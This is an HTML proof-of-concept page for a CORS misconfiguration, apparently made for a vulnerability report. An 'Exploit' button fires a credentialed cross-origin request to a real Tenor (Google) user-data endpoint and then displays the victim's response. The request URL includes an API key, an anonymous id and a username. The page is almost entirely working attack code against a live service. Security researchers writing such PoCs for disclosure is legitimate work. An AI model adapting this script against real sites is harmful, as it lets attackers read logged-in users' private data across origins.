<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
            <title>CORS POC</title>
        </head>
         <body>
             <h2>CORS PoC</h2>
             <div id="demo">
                 <button type="button" onclick="cors()">Exploit</button>
             </div>
             <script>
                 function cors() {
                 var xhr = new XMLHttpRequest();
                 xhr.onreadystatechange = function() {
                     if (this.readyState == 4 && this.status == 200) {
                     document.getElementById("demo").innerHTML = alert(this.responseText);
                     }
                 };
                  xhr.open("GET",
                           "https://tenor.googleapis.com/v2/user?appversion=browser-r20241212-1&prettyPrint=false&key=AIzaSyC-P6_qz3FzCoXGLk6tgitZo4jEJ5mLzD8&client_key=tenor_web&locale=en&anon_id=AAYpXbht_bMHSehp2xUp_w&username=user0902", true);
                 xhr.withCredentials = true;
                 xhr.send();
                 }
             </script>
         </body>
     </html>
